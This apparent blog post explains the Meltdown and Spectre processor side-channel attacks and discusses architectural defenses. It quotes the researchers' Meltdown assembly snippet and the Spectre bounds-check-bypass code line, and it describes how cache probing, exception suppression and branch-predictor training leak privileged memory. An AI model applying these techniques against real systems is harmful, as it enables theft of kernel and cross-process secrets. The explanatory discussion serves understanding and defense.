The Register pieced together disparate sources of information to break the news of Meltdown and Spectre that impact nearly every processor on the planet. I’m personally thankful to El Reg for bringing it out in the open.
What is Meltdown?
In short, Meltdown is a side-channel attack that enables data values to be discerned from cache misses, and Spectre allows for speculative execution of instructions to force the victim to perform privileged operations that leak information. While the privilege errors in both attacks are eventually caught and the CPU state rolled back, the attacks force the victim to execute code that they shouldn’t and leak information.
Here’s the code for Meltdown given by Lipp, Schwarts, Gruss, Prescher, Haas, Mangard, Kocher, Genkin, Yarom, and Hamburg for an x86 processor:
; rcx = kernel address ; rbx = probe array retry: mov al, byte [rcx] shl rax, 0xC jz retry mov rbx, qword [rbx + rax]
The code relies on speculative execution to reveal the contents of the memory location identified by rcx, which I will denote kernel[rcx]. Modern processors map the kernel into the user’s address space to facilitate faster traps and access, though the process generally doesn’t have permissions to that space. Consequently user[rbx] and kernel[rbx] are the same and I’ve denoted it differently to differentiate the privileged (kernel) space from the normal unprivileged (user) space.
The code begins after ensuring that the probe array (pointed at by rbx) is out of the cache, and it uses a very large (page-sized) stride for probe array references (shl rax, 0xC) shifts left by 12, or multiples by 4KB, which means that every byte offset has its own page and the prefetcher is disabled.
The key exploit is the mov al, byte [rcx] instruction, which takes kernel[rcx] and places it into the al register. This mov is invalid, and the permission check occurs in parallel to the memory operation — that is, the CPU dutifully performs the memory illegal/privileged memory operation while checking to make sure its allowed. This check takes a while. Then the simple arithmetic occurs (shl, which is nothing but a quick way to multiple by 4KB and make sure that each potential byte value has its own page in the probe array).
The mov rbx, qword [rbx + rax] completes the attack by loading the cache line in the probe array (rbx) calculated by the offset computed in rax, which itself was derived from the privileged information from the first move.
By the time the first move thrown the exception the word from the probe array is loaded into the cache. The attacker simply has to suppress the exception and determine which probe array cache line (there are only 256 possible cache lines) is in the cache. Both are easily accomplished, in fact, Transactional Memory actually accelerates the exception handling!
What is Spectre?
Aside from the infamous organization representing Ian Flemming’s classic villains from James Bond, aptly named attack can be executed independently or combined with Meltdown. The attack is described by Kocher, Genkin, Gruss, Haas, Hamburg, Lipp, Mangard, Prescher, Schwarz, and Yarom.
if (x < array1_size) y = array2[array1[x] * 256];
The value of x is fully within the control of the attacker, and he first trains the branch predictor to that the branch will be taken (that is, the condition x < array1_size is true). Now, like Meltdown, the processor can use invalid values of x to load data that its not privileged to access into the cache (and use that side-effect to read the data itself).
The simple version of this attack can circumvent processors that correctly perform speculative execution tests by disallowing speculation to an address that would result in a page fault. If this is the case, the attacker can take a page from Return Oriented Programming (ROP) and use “gadgets” (or small snippets of useful code in the victim/parent) to execute code on its behalf. In this case, instead of a buffer overflow, the attacker tricks the branch predictor into speculatively executing the gadgets to which it shouldn’t have access.
The executed gadgets may be “transient” in that the CPU will quash them and return the CPU state to normal if an exception is thrown, however, as we’ve already seen its possible to exploit the side-channel information.
The deployed patch for Meltdown has significant performance impact reported at 20% or more. Full Kernel isolation is slow!
Why are we here and what can be done?
The authors suggest a number of potential defenses, but, in some sense, there are fundamental architectural flaws being exploited. Simple things like not speculating across page faults help some, but the relatively easy (though clever!) nature of exploiting side-effect information leaves computers fundamentally vulnerable. Spectre has no good solution other than addressing the fundamental architectural flaw (or disabling high performance features in the processor!).
We could borrow a page from computing history and exploit other kinds of parallelism. Multithreading, such as that exploited by the Cray/Tera MTA and earlier machines by Burton Smith would guarantee that only valid instructions are executed. Given that 60% (+) of the server market consists of the hyperscale data centers and that their workloads are often throughput oriented, this could be a great match. It would possibly require rethinking the memory hierarchy to support these processors, but there are great implementation possibilities with ISAs like ARM and, perhaps some day in the future, RISC-V.
On the flip-side, not all workloads are throughput-oriented, and speculative out-of-order execution has been a cornerstone of computer architecture for 6 decades. Fundamentally, this is the result of unbalanced machine hierarchies that place more value on processors and significant opportunities exist to fix it in memory. These include:
- Smarter, distributed permission checking;
- Investing more in memory performance rather than already plentiful processor performance (after all, executing lots of math instructions on a small amount of data doesn’t represent today’s information era!);
- Better processor architectures, including features for security and reliability; and finally,
- More diversity of architectures, which is already underway given the slowing of Moore’s Law, to “raise the bar” for the attacker.
None of these things represents a “silver-bullet”, and they all have complex tradeoffs. Ultimately, where cybersecurity is concerned, the bar can be raised but there’s nothing that’s “perfectly secure”.